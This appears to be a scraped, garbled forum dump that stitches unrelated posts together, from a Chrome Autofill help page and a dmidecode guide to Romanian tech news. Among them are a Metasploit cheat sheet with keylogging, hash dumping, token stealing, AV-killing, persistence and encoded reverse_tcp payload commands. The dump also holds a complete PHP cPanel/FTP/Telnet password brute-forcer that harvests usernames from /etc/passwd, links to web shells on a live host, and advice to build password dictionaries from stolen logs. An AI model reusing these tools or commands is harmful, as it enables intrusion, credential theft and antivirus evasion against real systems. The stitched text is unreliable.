Fi8sVrs

Alphanumeric shellcode is similar to ascii shellcode in that it is used to bypass character filters and evade intrusion-detectionduring buffer overflow exploitation This article documents alphanumeric code on multiple architectures, but primarily the 64 bit x86 architecture. Alphanumeric shellcode requires a basic understanding of bitwise math, assembly and shellcode Contents 1 Available x86_64 instructions 2 Alphanumeric opcode compatibility 2.1 Alphanumeric inter-compatible x86 opcodes 2.2 15 byte architecture detection shellcode 3 Alphanumeric x86_64 register value and data manipulation 3.1 Push: alphanumeric x86_64 registers 3.2 Pop: alphanumeric x86_64 registers 3.3 Prefixes 3.4Operands 3.5 The rbx, rsp, and rbp registers 3.6 Xor 3.7 The rsi and rdi registers 3.8 Example: ZeroingOut x86_64 CPURegisters 4 64 bit shellcode:Conversion to alphanumeric code 4.1 bof.c 4.2 Starting shellcode (64-bit execve /bin/sh) 4.3 Shellcode Analysis 4.4 Stack Analysis 4.5 TheOffset 4.6 The Syscall 4.7 Arguments 4.7.1 Stack Space 4.7.2 Register Initialization 4.7.3 String Argument 4.7.4 Final Registers 4.8 Final Code 4.9 Successful OverflowTest Download: http://dl.packetstormsecurity.net/papers/shellcode/alpha.pdf Alphanumeric Shellcode ? Packet Storm

Today we are proud to launch a new Mozilla Webmaker app to the world. Meet Thimble, the new tool that makes it incredibly simple for anyone to create and share their own web pages and other projects in minutes. Thimble is webmaking made easy. It’s an intuitive visual editor that lets you write and edit HTML right in your browser, preview and correct your work, and then publish and share fully functional web pages with a single click. Thimble removes many of the barriers for novice users trying to learn code, and includes a series of starter projects and templates to help anyone get started quickly. Wired Webmonkey calls Thimble “one of the friendliest, easiest-to-use code editors we’ve seen.” We’re extremely excited about it, and it’s at the heart of Mozilla Webmaker’s mission to move people from using the web to making the web — and to create a more web literate planet. source: Introducing Thimble: webmaking made easy | The Mozilla Blog

Autofill forms Tired of filling out web forms with the same information time and time again? The Autofill feature lets you complete forms with just one click. How to use Autofill Your address information is stored in Google Chrome. The first time you fill out a form, Google Chrome automatically saves the contact information that you enter, like your name, address, phone number, or email address, as an Autofill entry. You can store multiple addresses as separate entries. Credit card information can also be securely stored. The browser can save your credit card information, with your explicit permission. When you enter credit card information on a form, Google Chrome asks you at the top of the page whether you'd like to save the information. Click Save info if you'd like the credit card to be saved as an Autofill entry. It takes just one click to fill out a form. When you start filling out a form, the Autofill entries that match what you're typing appear in a menu. Select an entry to automatically complete the form with information from the entry. Google Chrome also saves the text you've typed in specific form fields. The next time you fill out the same field, text that you've typed in the past appears in a menu. Just select the text you want to use from the menu to insert it directly into the field. Preview a form before you fill it out. To see how Google Chrome will complete a form before it actually fills it out, hover over an Autofill entry in the menu with your mouse. The fields that can be automatically completed are highlighted in yellow. Manage your Autofill entries Click the wrench icon on the browser toolbar. Select Settings. Click Show advanced settings and find the "Passwords and forms" section. Click Manage Autofill settings. In the dialog that appears, you can create as many profiles as you'd like: To save a new address entry, scroll to the end of the "Addresses" section and click Add new street address. To save a new credit card entry, scroll to the end of the "Credit Cards" section and click Add new credit card. To edit an existing entry, double-click it in the list to open the editing dialog. To delete an existing entry, select it from the list and click the x that appears at the end of the row. If you're using a Mac, addresses from your Address Book are included as potential Autofill matches by default. If you'd prefer not to see those addresses, deselect the "Include addresses from my Address Book" checkbox. Delete your form data Delete all Autofill entries and saved text Click the wrench icon on the browser toolbar. Select Tools. Select Clear browsing data. In the dialog that appears, select the "Clear saved Autofill form data" checkbox. Use the menu on the top to select the amount of data you want to delete. Select the beginning of time to clear everything. Click Clear browsing data. Delete specific Autofill entries Click the wrench icon on the browser toolbar. Select Settings. Click Show advanced settings and find the "Passwords and forms" section. Click Manage Autofill settings. In the dialog that appears, select the entry you'd like to delete from the list. Click the x that appears at the end of the row. Delete specific saved text When you type in a form field, a menu may appear, containing past text that you've typed in the field. To delete a specific piece of saved text, select it in the menu using the arrows on your keyboard, then press Shift+Delete. Enable or disable Autofill Autofill is typically turned on by default. Follow the steps below to disable it. Click the wrench icon on the browser toolbar. Select Settings. Click Show advanced settings and find the "Passwords and forms" section. Deselect the "Enable Autofill to fill out web forms in a single click" checkbox. https://support.google.com/chrome/bin/answer.py?hl=en&answer=142893&p=settings_autofill

FireSSH 0.90 by Mime ?uvalo FireSSH is a free, cross-platform SSH terminal client for Mozilla Firefox. Written entirely in Javascript! Download https://addons.mozilla.org/en-US/firefox/addon/firessh/

Version 1.0 Author: Falko Timme <ft [at] falkotimme [dot] com> Last edited 10/24/2008 dmidecode is a tool for dumping a computer's DMI (some say SMBIOS) table contents in a human-readable format. This table contains a description of the system's hardware components, as well as other useful pieces of information such as serial numbers and BIOS revision. Thanks to this table, you can retrieve this information without having to probe for the actual hardware. Take a look at man dmidecode to find out all options. The most common option is the --type switch which takes one or more of the following keywords: bios, system, baseboard, chassis, processor, memory, cache, connector, slot You can as well specify one or more of the following numbers: Each keyword is equivalent to a list of type numbers: Here are a few sample outputs from one of my servers: dmidecode --type bios dmidecode --type system dmidecode --type baseboard dmidecode --type chassis dmidecode --type processor dmidecode --type memory dmidecode --type cache dmidecode --type connector dmidecode --type slot http://www.howtoforge.com/dmidecode-finding-out-hardware-details-without-opening-the-computer-case

This article explains how to monitor a Linux systems network interfaces. Install BMon using the following command: apt-get install bmon Now run “bmon” to see something similar to the following: When running, you can select the interface to monitor and press “g” to see a active graph. Network Bandwidth Monitoring With BMon | AGIX Linux

Facebook cump?r? Opera ?i lanseaz? propriul web browser Dac? ultimele zvonuri se adeveresc, Facebook este pe cale s? achizi?ioneze Opera Software, urmând ca versiunile desktop ?i mobile ale web browser-ului cu acela?i nume s? devin? funda?ie pentru primul web browser Facebook, creat special pentru adep?ii re?elei de socializare. Facebook browser ar urma s? includ? componente plugin ?i meniuri Facebook, ce îmbog??esc sesiunile de web browsing cu elemente specifice re?elei de socializare, cum ar fi recomandarea paginilor interesante pe Facebook, postarea de imagini ?i comentarii. Aparent, scopul final este cel de a promova re?eaua Facebook de la statutul de simplu website pe care îl vizit?m, la cel de experien?? web, în care func?iile re?elei de socializare sunt accesibile permanent, indiferent de website-ul pe care îl r?sfoim. Dat? fiind popularitatea de care se bucur? în prezent Opera Mobile, adaptarea acestuia pentru Facebook browser are ?anse mari de reu?it?, rezultatul fiind un web browser chiar ?i mai atr?g?tor pentru cei 900 milioane de adep?i ai re?elei de socializare. Odat? cu lansarea unui web browser propriu, Facebook va intra într-o competi?ie pe dou? fronturi cu Google, de?in?torul re?elei Google+ ?i web browser-ul Chrome - recent avansat la statutul de cel mai folosit browser web, în defavoarea Internet Explorer. Dac? pân? acum Google+ avansa cu pa?i mici în lumea re?elelor de socializare, Facebook browser va complica ?i mai mult lucrurile, for?ând Google c?tre strategii ?i mai agresive de promovare, cum ar fi integrarea func?iilor Google+ cu web browser-ul Chrome, Sursa: Facebook cump?r? Opera ?i lanseaz? propriul web browser

http://bestinternetwebhosting.com/kt/sym.php [+] Symlink script[+] http://bestinternetwebhosting.com/kt/bomba/ [+] Symlink dir[+] http://bestinternetwebhosting.com/kt/cgishell/itsecteam.php [+] shell /dir/ [+] http://bestinternetwebhosting.com/kt/sym.php?sws=sym [+] User & Domains & Symlink [+] via cr0wn at r00tworkm

ar trebui extrase passurile din logurile care le aveti si facut un dictionar cu cele mai frecvent folosite parole

Meterpreter Process: getuid hows user id getpid shows meterpreter process id ps ists running processes migrate [ps] migrates to given process (one that wont end/crash) KeyLog: Ensure you are monitoring the correct session (Explorer.exe/WinLogin.exe) idletime shows how long machine has been idle for keyscan_start starts the key logger keyscan_dump outputs captured data keyscan_stop stops the keylogger Channels: This allows you to do more than one thing at a time in meterpreter execute -f cmd.exe -c opens a new cmd.exe and creates a new channel for it channel -l lists the open channels read [channel] outputs data from channel interact [channel] allows you to jump into the channel write [channel] sends data to the channel close [channel] kills the channel Session: Session0 is the local desktop. Session1+ are rdp sessions. enumdesktops shows currently open desktops such as winlogin etc getdesktop shows current desktop session meterpreter is in setdesktop changes to an already open desktop session uictl disable keyboard disables the keyboard of the desktop session FileEdit: Ability to edit files atributes such as MACE timestomp file.txt -c "30/12/1980 12:12:34" changes file stamp of file timestomp file.txt -f sourcefile.txt copys timestamp from sourcefile.txt use priv to load the priv extras hashdump to dump the SAM file Tokens: Incognito allows token stealing and other token functions use incognito loads the incognito into meterpreter list_tokens -u shows stealable tokens impersonate_token allows a token to be stolen steal_token [psid] allows ability to steal token of a process rev2self reverts to origional token run post/windows/gather/cachedump gets cached domain hashes need to wget http://lab.mediaservice.net/code/cachedump.rb to framework3/modules/post/windows/gather Sniffer: Allows promiscuos mode to be enabled use sniffer loads the sniffer functions sniffer_interfaces list interface 1,2,3,4,5,6,etc sniffer_start [n] starts the sniffer for the interface sniffer_stats [n] lists packets, time, etc.. sniffer_dump [n] file.pcap dumps the capture locally sniffer_stop you guessed it Meterpreter Scripts: These scripts perform various functions on the victim run checkvm checks if the target is a vm run credscollect dumps hashes and tokens to screen run enum_firefox dumps temp internet files from firefox – cookies, passwords, etc run get_application_list shows installed applications run killav trys to stop all known AV progs run get_local_subnets enumerates local subnet info run metsvc creates a backdoor run persistence survices a reboot (without admin or system) run schedulme -e file.exe -m 30 you‘ll need to man load the meterpreter.exe payload run kitrap0d allows priv escalation using CVE-2010-0232 web browser exploit use auxilary/server/browser_autopwn set LHOST [local_ip] set SRVPORT 80 set URIPATH / run #now get the client to connect to you (use ettercap dns) inbuilt sqlite db db_driver sqlite3 starts the db using sqlite (file based) db_connect job creates a new db called job and connects to it db_hosts shows hosts db_services shows visible services db_nmap -sS [target_ip] performs nmap against target and stores in db dn_import_nmap_xml allows inport db_autopwn -p -e -r -t autoown from db vulns Meterpreter Payload Backdoor ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 X > clear.exe ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o encoded.exe sets the payload as meterpreter and then encodes it 5 times to bypass AV ./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /share/spider.exe -e x86/shikata_ga_nai -c 5 #this fucker bypasses sophos ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=4444 E One Liners # One liner meterpreter reverse_tcp /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep ‘inet addr:’| grep -v ’127.0.0.1? | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 X > /root/clear.exe # One liner shikata encoded meterpreter reverse_tcp /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep ‘inet addr:’| grep -v ’127.0.0.1? | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/encoded.exe # One liner encoded and hidden in windows exe meterpreter reverse_tcp /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig | grep ‘inet addr:’| grep -v ’127.0.0.1? | cut -d: -f2 | awk ‘{ print $1}’` LPORT=4444 R |/pentest/exploits/framework3/msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /root/spider.exe -e x86/shikata_ga_nai -c 5 Metasploit Notes | phillips321.co.uk

So I’ve been using my bt5-nmap.sh script for a few years to quickly gather data whilst on a pentest. The main issue with the way this script worked was it was not easy to continue a session half way through or to modify the number of running threads. This new script uses dialog which comes as standard in bt5. Options: arpscan “run arp-scan to create targets.txt” nmap “nmap targets” amap “amap ports found using nmap” sslscan “sslscan targets” gwp “Take photo of web pages found?” snmpscans “Check for default SNMP community strings” snmpget “Get data from SNMP services using known strings” enum4linux “Run enum4linux against targets” smtp “connect to SMTP to check if they allow relaying of mail” uniscan “run uniscan against HTTP(s) ports” nfsscan “connect to nfs services and list contents” You can checkout the code using the following svn command: svn checkout phillips321 - Revision 24: /trunk phillips321 or view the code on the googlecode page. Here are a few photo’s followed by a quick demo video… https://www.phillips321.co.uk/pentest-sh/

Anubis Comodo GFI sandbox jsunpack Norman ThreatExpert Wepawet

If you need to extract all the links / URLs from a Google search you can use the following commands: wget -q -U "Mozilla/5.001" -O - "http://www.google.com/search?q=inurl%3Aaftershell.com&num=100&start=200" | \ grep -o '<a href="http[^"]*"'|grep -v 'search?q=cache:'|grep -v '\.google\.'|sed 's/<a href="//;s/"$//' You can modify them to save the output or change the parameters for the languages (&hl= and &lr= ) and many more... AfterShell.com

<?php $cpanel_port="2082"; $connect_timeout=5; set_time_limit(0); $submit=$_REQUEST['submit']; $users=$_REQUEST['users']; $pass=$_REQUEST['passwords']; $target=$_REQUEST['target']; $cracktype=$_REQUEST['cracktype']; if($target == ""){ $target = "localhost"; } ?> <html> <head> <meta http-equiv="Content-Language" content="en-us"> </head> <title>Cpanel , FTP CraCkeR</title> <body text="#00FF00" bgcolor="#000000" vlink="#008000" link="#008000" alink="#008000"> <div align="center"> <form method="POST" style="border: 1px solid #000000"> <img border="0" src="http://www.alm3refh.com/upload/group/groupxp.gif" width="426" height="169"><table border="1" width="67%" bordercolorlight="#008000" bordercolordark="#003700"> <tr> <td> <p align="center"><b><font color="#008000" face="Tahoma" size="2"> <span lang="en-us">IP server</span> :</font><font face="Arial"> </font><font face="Arial" color="#CC0000"> <input type="text" name="target" size="16" value="<?php echo $target ?>" style="border: 2px solid #1D1D1D; background-color: #000000; color:#008000; font-family:Verdana; font-weight:bold; font-size:13px"></font></b></p> <p align="center"><b><font color="#008000" face="Tahoma" size="2"> </font></b></p> <div align="center"> <table border="1" width="57%" bordercolorlight="#008000" bordercolordark="#003700"> <tr> <td align="center"> <span lang="en-us"><font color="#FF0000"><b>User List</b></font></span></td> <td> <p align="center"> <span lang="en-us"><font color="#FF0000"><b>Password List</b></font></span></td> </tr> </table> <p align="center"> <textarea rows="20" name="users" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $users ?> </textarea><textarea rows="20" name="passwords" cols="25" style="border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0"><?php echo $pass ?></textarea><br> <br> <font style="font-weight:700" size="2" face="Tahoma" color="#008000"> <span lang="ar-sa">Guess options</span></font><font style="font-size: 12pt;" size="-3" face="Verdana"><span style="font-size: 9pt;"> <font face="Tahoma"> <input name="cracktype" value="cpanel" style="font-weight: 700;" checked type="radio"></font></span></font><b><font size="2" face="Tahoma"> Cpanel</font><font size="2" color="#cc0000" face="Tahoma"> </font><font size="2" color="#FFFFFF" face="Tahoma"> (2082)</font></b><font size="2" face="Tahoma"><b> </b> </font> <font style="font-size: 12pt;" size="-3" face="Verdana"> <span style="font-size: 9pt;"><font face="Tahoma"> <input name="cracktype" value="cpanel2" style="font-weight: 700;" type="radio"></font></span></font><b><font size="2" face="Tahoma"> Telnet</font><font size="2" color="#cc0000" face="Tahoma"> </font><font size="2" color="#FFFFFF" face="Tahoma"> (23)</font></b><font size="2" face="Tahoma"><b> </b> </font> <font style="font-size: 12pt;" size="-3" face="Verdana"> <span style="font-size: 9pt;"><font face="Tahoma"> <input name="cracktype" value="ftp" style="font-weight: 700;" type="radio"></font></span></font><font style="font-weight: 700;" size="2" face="Tahoma"> </font><span style="font-weight: 700;"> <font size="2" face="Tahoma">Ftp </font> <font size="2" color="#FFFFFF" face="Tahoma"> (21)</font></span> <br> <font style="font-weight:700" size="2" face="Tahoma" color="#008000"><span lang="ar-sa">Timeout delay</span> <input type="text" name="connect_timeout" style="border: 2px solid #1D1D1D;background: black;color:RED" size=48 value="<?php echo $connect_timeout;?>"></input> </p> <p align="center"> <input type="submit" value="Go" name="submit" style="color: #008000; font-weight: bold; border: 1px solid #333333; background-color: #000000"></p> </td> </tr> </table> <p align="center"></td> </tr> </form> <?php function ftp_check($host,$user,$pass,$timeout) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "ftp://$host"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\"> <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout Please Check The Target Hostname .</font></font></b></p>";exit; } else if ( curl_errno($ch) == 0 ) { print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"#008000\"> Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>"; } curl_close($ch); } function cpanel_check($host,$user,$pass,$timeout) { global $cpanel_port; $ch = curl_init(); //echo "http://$host:".$cpanel_port."<br>"; curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\"> <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout Please Check The Target Hostname .</font></font></b></p>";exit;} else if ( curl_errno($ch) == 0 ){ print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"#008000\"> Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>"; } curl_close($ch); } if(isset($submit) && !empty($submit)) { if(empty($users) && empty($pass)) { print "<p><font face=\"Tahoma\" size=\"2\"><b><font color=\"#FF0000\">Error : </font>Please Check The Users or Password List Entry . . .</b></font></p>"; exit; } if(empty($users)){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Users List Entry . . .</b></font></p>"; exit; } if(empty($pass) ){ print "<p><font face='Tahoma' size='2'><b><font color='#FF0000'>Error : </font>Please Check The Password List Entry . . .</b></font></p>"; exit; }; $userlist=explode("\n",$users); $passlist=explode("\n",$pass); print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0000\"> Cracking Process Started, Please Wait ...</font></b><br><br>"; if(isset($_POST['connect_timeout'])) { $connect_timeout=$_POST['connect_timeout']; } if($cracktype == "ftp") { foreach ($userlist as $user) { $pureuser = trim($user); foreach ($passlist as $password ) { $purepass = trim($password); ftp_check($target,$pureuser,$purepass,$connect_tim eout); } } } if ($cracktype == "cpanel" || $cracktype == "cpanel2") { if($cracktype == "cpanel2") { $cpanel_port="23"; } else $cpanel_port="2082"; foreach ($userlist as $user) { $pureuser = trim($user); print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#FF0800\"> Processing user $pureuser ...</font></b><br><br>"; foreach ($passlist as $password ) { $purepass = trim($password); cpanel_check($target,$pureuser,$purepass,$connect_ timeout); } } } } ?> <p align="center"><b><a href="http://www.alm3refh.com/vb"> <span style="text-decoration: none">Sunni</span></a></b></p> <form style="border: 0px ridge #FFFFFF"> <p align="center"></td> </tr><div align="center"> <tr> <input type="submit" name="user" value="user"><option value="name"></select> </form> <div align="center"> <table border="1" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="1"> <tr> <td bordercolorlight="#008000" bordercolordark="#006A00"> <p align="left"> <textarea style="border: 2px solid #1D1D1D;background: #200000;color:#CCFFFF" method='POST' rows="25" name="S1" cols="22"> <?php if (isset($_GET['user'])) system('ls /var/mail'); if (isset($_POST['grab_users1'])) //grab users from /etc/passwd { $lines=file("/etc/passwd"); foreach($lines as $nr=>$val) { $str=explode(":",$val); echo $str[0]."\n"; } } if (isset($_POST['grab_users2'])) { $dir = "/home/"; if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { echo $file. "\n"; } closedir($dh); } } for($uid=0;$uid<90000;$uid++) { } ?></textarea> <table> <tr> <form action="" method="POST"> <input type="hidden" value="true" name="grab_users1"></input> <input type=submit value="Grab Usernames from /etc/passwd"></input> </form> </tr> <br> <tr> <form action="" method="POST"> <input type="hidden" value="true" name="grab_users2"></input> <input type=submit value="Grab Usernames from /home/"></input> </form> </tr> <br> <tr> <form action="" method="POST"> <input type="hidden" value="true" name="grab_users3"></input> <input type=submit value="Grab Usernames from /home/ II"></input> </form> </tr> </form> </table> <?php if (isset($_POST['grab_users3'])) { error_reporting(0); $dir = "/home/"; if ($dh = opendir($dir)) { $f = readdir($dh);$f = readdir($dh); while (($f = readdir($dh)) !== false) { //echo $f. "\n"; $f.="/"; $dh2=opendir($dir.$f); $f2 = readdir($dh2);$f2 = readdir($dh2); while (($f2 = readdir($dh2)) !== false) { //echo $f2. "\n"; $f2.="/"; $dh3=opendir($dir.$f.$f2); $f3 = readdir($dh3);$f3 = readdir($dh3); while (($f3 = readdir($dh3)) !== false) { echo $f3. "<br>"; } } } closedir($dh); } } ?> source: r00tw0rm

SeciTc 5th International Conference on Security for Information Technology and Communications June 2012, Bucharest Romania Conference areas: Cryptographic Algorithms and Protocols Security Technologies for IT&C Information Security Management Conference papers: will be published in a the printed volume of the Conference Proceedings Selected papers from the conference will be considered for publication in the supporting journals. Journal of Mobile, Embedded and Distributed Systems Journal of Applied Quantitative Methods Printed volume with ISBN 5th International Conference on Security for Information Technology and Communications edit: a fost program

specifica sursa de unde l-ai luat

http://www.youtube.com/watch?v=3mch44il4QE Description: Fimap is a python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's currently under heavy development but it's usable. from: securitytube.net

Online tool for creating .htaccess files: [en] .htaccess Editor root@KinG-InFeT ~ $_

This archive contains all of the 251 exploits added to Packet Storm in May, 2012. Directory: \1205-exploits Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 5/11/2012 5:44 AM 4826 9sg_photoshock.tgz -a--- 5/22/2012 4:37 AM 4420 activecollab_chat.rb.txt -a--- 5/20/2012 10:22 PM 2050 acuitycms-shell.txt -a--- 5/20/2012 8:22 PM 1215 acuitycms-traversal.txt -a--- 5/23/2012 5:52 AM 2251 ajamintgallery-lfi.txt -a--- 5/20/2012 8:22 PM 3803 ajaxmintgallery-xsrf.txt -a--- 5/2/2012 4:51 AM 2884 alsovalue-sql.txt -a--- 5/4/2012 1:46 AM 4996 anvsoft-overflow.txt -a--- 5/12/2012 8:22 PM 2796 anvsoftanyvideo-overflow.txt -a--- 5/24/2012 5:44 AM 3339 apprain_upload_exec.rb.txt -a--- 5/19/2012 7:33 AM 1182 attractwebcms-sql.txt -a--- 5/16/2012 1:42 AM 6296 axous-csrf.txt -a--- 5/27/2012 9:48 PM 13034 azdgdatingmedium-xssxsrfexec.txt -a--- 5/20/2012 6:22 PM 734 azphotoalbum-xss.txt -a--- 5/14/2012 11:22 PM 1669 b2epms-sql.txt -a--- 5/27/2012 9:56 PM 2081 b2epms10-sql.txt -a--- 5/8/2012 4:13 PM 5116 baglercms-sqlxss.txt -a--- 5/18/2012 5:58 PM 3590 batik_svg_java.rb.txt -a--- 5/18/2012 5:58 PM 5088 bea_weblogic_post_bof.rb.txt -a--- 5/24/2012 3:12 PM 881 bsnes-dos.txt -a--- 5/17/2012 2:14 AM 634 captchaunijimpe-xss.txt -a--- 5/11/2012 12:11 AM 17502 chevereto-dos.txt -a--- 5/10/2012 7:11 AM 4030 chevreto-xss.txt -a--- 5/20/2012 6:22 PM 4217 chiccosnoopyclub-sqlxss.txt -a--- 5/8/2012 8:17 PM 3377 ciscolinksys-xsrf.txt -a--- 5/20/2012 4:22 PM 802 cmsahmebaprofessional-shell.txt -a--- 5/19/2012 12:09 PM 259553 concrete5521-xssxsrf.txt -a--- 5/20/2012 6:22 PM 4830 concretecms-shelldos.txt -a--- 5/8/2012 6:15 PM 13205 CORE-2012-0123.txt -a--- 5/18/2012 5:22 AM 1330 cryptographp-hrslfi.txt -a--- 5/25/2012 11:26 PM 3306 CSA-12005.txt -a--- 5/9/2012 8:23 PM 2495 decisiontools-exec.txt -a--- 5/4/2012 7:23 AM 3836 designmodern-sqlxss.txt -a--- 5/12/2012 12:59 AM 3256 distinct_tftp_traversal.rb.txt -a--- 5/18/2012 12:20 AM 4352 division6it-sqlxss.txt -a--- 5/25/2012 11:29 PM 6285 dorncms-shell.rb.txt -a--- 5/20/2012 2:11 PM 921 doubletakedesign-sql.txt -a--- 5/20/2012 6:22 PM 1061 dvdlab-dos.txt -a--- 5/25/2012 10:11 PM 4705 dynpage-xsrfshell.txt -a--- 5/7/2012 10:57 PM 1689 efront-shellxss.txt -a--- 5/11/2012 5:38 AM 560 elearning4g-sqlrfi.txt -a--- 5/7/2012 10:55 PM 2988 enjoygraphcommunication-sql.txt -a--- 5/2/2012 4:33 AM 2952 estudioayllon-sql.txt -a--- 5/7/2012 10:53 PM 2898 etelligence-sql.txt -a--- 5/3/2012 12:17 AM 1113 exophpdesk121-sql.txt -a--- 5/17/2012 2:41 AM 1195 flashpeak-dos.txt -a--- 5/31/2012 3:03 AM 1468 fldl-navigate.txt -a--- 5/22/2012 4:40 AM 5083 flexnet_lmgrd_bof.rb.txt -a--- 5/4/2012 1:34 AM 2288 fortiweb-bypass.txt -a--- 5/22/2012 4:39 AM 3643 foxit_reader_launch.rb.txt -a--- 5/14/2012 3:12 PM 712 galette-sql.txt -a--- 5/31/2012 2:52 AM 5762 ganesha-sqlxss.txt -a--- 5/25/2012 11:57 PM 1165 gekkocms-disclose.txt -a--- 5/31/2012 3:21 AM 2699 gimp-overflow.tgz -a--- 5/9/2012 8:55 PM 748 guitarpro-dos.txt -a--- 5/2/2012 4:52 AM 1345 heycats-xss.txt -a--- 5/18/2012 5:20 PM 2313 hpvsa-exec.txt -a--- 5/22/2012 4:38 AM 2755 hp_vsa_exec.rb.txt -a--- 5/31/2012 2:50 AM 3692 ibaguenet-sql.txt -a--- 5/3/2012 12:18 AM 1344 iguard-xss.txt -a--- 5/14/2012 2:23 AM 50164 imgrd_1.tgz -a--- 5/2/2012 7:00 AM 266 index.html -a--- 5/12/2012 2:11 PM 808 indexa-sql.txt -a--- 5/4/2012 2:03 AM 3214 ineat-sql.txt -a--- 5/27/2012 1:22 AM 2124 ios5_safari_js_crash.rb.txt -a--- 5/29/2012 2:19 AM 2143 ispvm_xcf_ispxcf.rb.txt -a--- 5/24/2012 5:47 PM 1472 jaow-sql.txt -a--- 5/7/2012 10:59 PM 2763 jibberbook-bypass.txt -a--- 5/11/2012 5:39 AM 1195 kerio-disclose.txt -a--- 5/6/2012 5:20 AM 1318 kerwebkerwin-xss.txt -a--- 5/9/2012 10:22 PM 1339 KORAMIS-ADV2012-001.txt -a--- 5/29/2012 2:04 AM 71737 libreoffice-dos.txt -a--- 5/16/2012 1:06 AM 44140 liferay-bypass.tgz -a--- 5/16/2012 1:16 AM 5314 liferay-disclose.tgz -a--- 5/14/2012 6:44 PM 941 liferay-escalate.txt -a--- 5/16/2012 1:35 AM 1516 liferay-xsrf.tgz -a--- 5/16/2012 1:10 AM 1787 liferay6-xss.txt -a--- 5/4/2012 1:40 AM 3276 lynx-sqlxss.txt -a--- 5/4/2012 1:45 AM 2923 mcafee_mvt_exec.rb.txt -a--- 5/7/2012 10:52 PM 4051 mdg-sqlxsrf.txt -a--- 5/2/2012 4:25 AM 13011 mikrotik-dos.txt -a--- 5/3/2012 12:35 AM 1332 mountaininternet-xss.txt -a--- 5/14/2012 8:37 AM 13908 mozilla_attribchildremoved.rb.txt -a--- 5/9/2012 1:22 AM 11395 mozilla_nssvgvalue.rb.txt -a--- 5/30/2012 2:26 AM 2856 mplayer_sami_bof.rb.txt -a--- 5/16/2012 1:01 AM 1125 multimediabuilder-dos.txt -a--- 5/2/2012 4:18 AM 1296 mychiptime-xss.txt -a--- 5/12/2012 1:11 PM 1553 nec-backdoor.txt -a--- 5/31/2012 2:49 AM 2783 newsadd-sql.txt -a--- 5/7/2012 11:00 PM 671 nexusinfotech-sql.txt -a--- 5/2/2012 5:07 AM 1982 NGS00117-1.txt -a--- 5/2/2012 5:11 AM 1709 NGS00118-1.txt -a--- 5/2/2012 4:05 AM 4086 NGS00137-1.txt -a--- 5/2/2012 4:07 AM 3437 NGS00138-1.txt -a--- 5/2/2012 4:28 AM 5677 NGS00140-1.txt -a--- 5/2/2012 5:00 AM 3758 NGS00141-1.txt -a--- 5/20/2012 2:11 PM 3560 nogod-sql.txt -a--- 5/23/2012 5:49 AM 7086 novell491-escalate.txt -a--- 5/15/2012 2:28 AM 3840 ntds-sql.txt -a--- 5/2/2012 6:54 PM 4518 openconf-sql.txt -a--- 5/23/2012 5:22 PM 1436 openid-session.txt -a--- 5/24/2012 5:44 AM 2490 openoffice_ole.rb.txt -a--- 5/11/2012 6:34 PM 677 